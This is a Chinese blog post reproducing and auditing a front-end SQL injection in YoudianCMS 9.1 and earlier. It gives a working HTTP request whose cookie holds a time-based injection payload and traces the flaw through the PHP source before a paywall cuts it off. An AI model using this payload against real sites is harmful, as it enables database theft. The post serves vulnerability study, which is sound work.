友点CMS V9.1 前台SQL注入

最新推荐文章于 2024-04-22 18:00:00 发布
最新推荐文章于 2024-04-22 18:00:00 发布
阅读量3.3k 收藏 1
点赞数
分类专栏: 漏洞复现 代码审计 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nginxx/article/details/121409101
版权

漏洞描述

友点 CMS V9.1 前台存在 sql 注入,攻击者可获取数据库内容

漏洞影响

youdiancms <=9.1

漏洞复现

GET /index.php/Channel/voteAdd HTTP/1.1
Host: www.youdiancms90.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=pn9iofrfklen68u4205veml8s0; youdianAdminLangSet=cn; XDEBUG_SESSION=PHPSTORM; youdianfu[0]=exp; youdianfu[1]==(select 1 from(select sleep(3))a)
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

漏洞细节

变量控制

这里首先有一个可以直接赋值的变量,在 App/Lib/Action/HomeBaseAction.class.php

class HomeBaseAction extends BaseAction {
   
	protected $_fromUser = '';  //微信内部号
	protected $_isWx=0;  //是否是微信浏览器访问
	function _initialize(){
   
		parent::_initialize();
		$this->_assignPublicVar();
		$this->_assignConfigVar();
		$this->getTemplateConfig();
		
		//获取微信帐号=======================
		if( isset( $_GET['fu'])  && !empty( $_GET['fu']) ){
   
			$this->_fromUser = $_GET['fu'];
			cookie('fu', $this->_fromUser, 31536000); //31536000秒=1年,有效期为1年
		}else if( cookie('fu') ) {
   
			$this->_fromUser = cookie('fu');
		}
		//===============================
	}

主要看到下面赋值的位置,如果 GET 了一个 fu ,那么就会将这个的值赋值给 cookie,这里的 cookie方法可以跟进去看看,最后是加了一个前缀

$name = $config['prefix'] . $name;

最后是将 GETfu 的值赋值给了 youdianfu

我们如果一开始就给 youdianfu 赋值,那么我们就可以直接控制变量 $this->_fromUser

sql注入

接下来可以找哪里用到了这个 $this->_fromUser ,可以直接搜索

我们这里使用参考文章中使用的 voteAdd 方法,在 App/Lib/Action/Home/ChannelAction.class.php

public function voteAdd(){
   
    header("Content-Type:text/html; charset=utf-8");
    $item = $_REQUEST['item'];
    $appid = intval($_REQUEST['appid']);
    $fromUser = !empty($this->_fromUser) ? $this->_fromUser : get_client_ip();
    $_REQUEST = YdInput::checkTextbox( $_REQUEST );
    $m = D('Admin/WxVote');
    if($m->hasVoted($appid, $fromUser) ){
   
        $this->ajaxReturn(null, '', 2);
    }

这里会检测有没有 $this->_fromUser ,我们可以通过 cookie 设置,然后直接进入 $m->hasVoted($appid, $fromUser),我们跟进 App/Lib/Model/Admin/WxVoteModel.class.php

function hasVoted($appid, $fromUser){
   
    $where['AppID'] = $appid;
    $where['FromUser'] = $fromUser;
    $n = $this->where($where)->count
最低0.47元/天 解锁文章
黑白之间安全团队
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
友点CMS源码
04-25
友点CMS源码
骑士5.0.1 CMS +前台存在SQL注入
04-25
骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的“平台+插件”体系,打造用户“DIY”个性化功能定制,为众多地方门户、行业人才提供一个专业、稳定、方便的网络招聘管理平台,致力发展成为引领市场风向的优质高效的招聘软件
万众CMSSQL注入到getshell
最新发布
2301_80115097的博客
04-22 1162
像这种代码根本没办法在密码处注入,因为密码会先被 md5() 函数处理完了之后只能是一串字符串了,只能是在用户名处进行注入,再通过代码逻辑进行绕过从而登录后台,其实者应该叫万能用户登录吧?但是登录到的是admin用户,问题不大,反正是进去了,然后如果有权限限制,可以试试能不能写入到文件上传对应的那个路径,因为在WEB上已经把上传的文件类型限死了,这个CMS的文件上传我觉得只能结合文件包含漏洞来用,不太能直接传一个php吧,因为他改后缀啊…如果有大佬能绕也请评论区告知,带带弟弟吧,呜呜。
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
php前台登录 sql注入_代码审计之phpshev1.7前台注入和zzzphpv1.74后台sql注入
weixin_39933724的博客
03-09 500
phpshe v1.7前台sql注入漏洞分析环境:phpstudy2016: nginx+mysql+php5.6.27phpstorm+seay1.漏洞存在点:使用seay源代码审计系统即可看到sql注入点在文件C:\phpstudy\WWW\phpshe1.7\include\class\db.class.php中的第214行public function pe_select($t...
(全新接口)友点cms某接口存在sql注入漏洞-0day漏洞
weixin_43167326的博客
02-22 522
友点CMS(YouDian CMS)是一款专业的内容管理系统,致力于为用户提供简单易用、功能丰富的网站建设解决方案。友点CMS具有灵活的模块化设计,支持自定义模板和插件开发,便于用户根据需求定制网站风格和功能。其强大的内容管理功能包括文章发布、多媒体管理、SEO优化等,同时提供用户管理、权限控制等管理功能,适用于各类网站类型,如企业官网、新闻资讯等。友点CMS通过简单高效的操作界面和扩展性强大的特点,帮助用户快速搭建优质网站。。
狮子鱼cms-SQL注入
weixin_46663238的博客
10-20 2088
狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞 FOFA语法: “/seller.php?s=/Public/login” 后台登录界面 漏洞点:ApiController.class.php public function goods_detail() { $goods_id = I('get.goods_id'); //gallery =>img_url //go...
(代码审计)zzcms前台SQL注入
Cobra的博客
04-20 547
代码审计
Goby漏洞更新 | YoudianCMS v9.5.0 sql注入(CVE-2022-32300)
m0_46699477的博客
04-06 780
YouDianCMS是一个网站CMS。YoudianCMS v9.5.0版本存在安全漏洞,该漏洞源于通过/App/Lib/Action/Admin/MailAction.class.php处的MailSendID参数发现存在SQL注入漏洞。
youdiancms 9.5.0 版本 SQL注入(vulfocus复现)
qq_40646572的博客
04-24 1077
从上述信息,可以看到,web服务的80端口被映射到62461端口,并且该服务对外开启了3306端口并映射到20130 端口。并且给了数据库的相关信息。
友点cms友点cms建站,友点cms程序
xiaomaseo的博客
03-23 813
友点cms,可以实现PC站+手机站+微官网+多端小程序+APP合为一体,这样就能实现网站能够抢占全网入口。电脑站、手机站、微官网、多端小程序、APP合1,数据自动同步。友点cms开放源码、可以自己修改代码,满足个性化需求,有大量网站组件,像搭积木一样轻松搭建网站。 友点cms更容易网络推广,因为友点cms后台内置SEO功能,让站长的网站更容易被推广、更具吸引力。友点cms的应用插件,提供的免费应用插件,功能无限扩展,站长还可以自行开发。友点cms代码开源,这样更易于二次开发,系统代码开源,可部署.
YouDianCMS 友点企业网站管理系统 v7.4
12-08
友点企业网站管理系统集电脑站、手机站、微信、APP、小程序于一体,共用空间,数据同步,是国内五站合一优秀解决方案。系统采用PHP开发,具有操作简单、功能强大、稳定性好、易
服务器常用后门一键检测和清除工具
10-08
在IDC的服务器拿到的服务器常用后门一键检测和清除工具不敢独享,给大家分享出来,有此利器服务器后门马上显出原形!!!
YouDianCMS 开源五合一建站系统 v9.0
11-03
为您提供YouDianCMS 开源五合一建站系统下载,YouDianCMS友点企业网站管理系统集电脑站+手机站+微信站+APP+小程序五合一,数据自动同步,降低人力维护成本;共用一个管理后台,只要一个虚拟主机,有效节约空间投资。系统采用开源技术PHP+MYSQL开发,开源且具有操作简单、功能强大、稳定性好、易扩展、安全性强、维护方便、兼容性好等特点,可帮您快速构建一个强大专业的企业网站。系统支持多语言轻松打造国际站、自定义模型、支持网站模板换肤、内
YouDianCMS v8.0 开源PC手机微信app小程序五合一 v8.0.zip
07-06
YouDianCMS简介 YouDianCMS友点企业网站管理系统集电脑站 手机站 微信站 APP 小程序五合一,数据自动同步,降低人力维护成本;共用一个管理后台,只要一个虚拟主机,有效节约空间投资。系统采用PHP MYSQL,具有操作简单、轻便快捷、稳定性好、易扩展、安全性强、后期维护方便等特点,可以帮您迅速、轻松地构建起一个强大专业的企业网站。系统除支持多语言、自定义模型、SEO优化、静态页生成、评论留言、订购、会员、广告、招聘、统计、自助表单等常见企业网站基本功能外,还有微信接口、数据采集、英文自动翻译、一键备份等特色功能。运行环境:PHP5.3/5.4/5.5/5.6/7.0/7.
YouDianCMS系统 V7.4.4_php5.2
04-12
友点企业网站管理系统(简称YouDianCMS系统)集电脑站、手机站、微信、APP、小程序于一体,共用空间,数据同步,是国内五站合一优秀企业建站解决方案。系统采用PHP开发,具有操作简单、功能强大、稳定性好、易扩展、安全性强、维护方便等特点,可帮您快速构建一个强大专业的企业网站。系统支持多语言、自定义模型、SEO优化、静态页、评论留言、购物车、在线支付、订单管理、会员、广告等企业网站基本功能。运行环境:PHP5.2+MYSQL+Zend
CSZ CMS 1.2.X sql注入漏洞
09-07
# (CVE-2019-13086)CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统(CMS)。 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞...
网新中英繁CMS v9.1.rar
04-02
网新中英繁CMS v9.1.rar
CMS程序Dragonfly CMS v9.1.2.1-dragonfly9.1.2.1.zip
03-09
[CMS程序]Dragonfly CMS v9.1.2.1_dragonfly9.1.2.1.zip试卷可打印可复制可编辑
友点cms9.1 getshell漏洞
05-01
友点CMS9.1是一款国内常用的开源CMS系统,近日被指出存在一个getshell漏洞,该漏洞可允许攻击者通过构造特殊的请求参数向网站注入任意代码,并获取服务器的控制权。 经分析,该漏洞影响范围较广,可影响友点CMS9.1及其以下版本。攻击者通过构造恶意请求的方式,可以在服务器上创建备份文件、写入木马文件等,从而达到控制被攻击网站的目的。 该漏洞的原因主要是由于友点CMS未对输入数据进行充分过滤和校验,允许攻击者通过对请求参数的篡改来实现代码注入攻击。建议用户尽快升级友点CMS至9.1.1版本,该版本已针对此漏洞进行了修复。 在实际应用中,为了防止此类漏洞的发生,建议管理员在搭建网站时采取必要的防护措施,如加强受限访问、设置访问认证、定期检查网站安全漏洞等,以加强网站的安全性和稳定性。同时,用户应该注意及时更新网站软件补丁、适时备份网站数据等措施,确保网站的更好安全保障。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值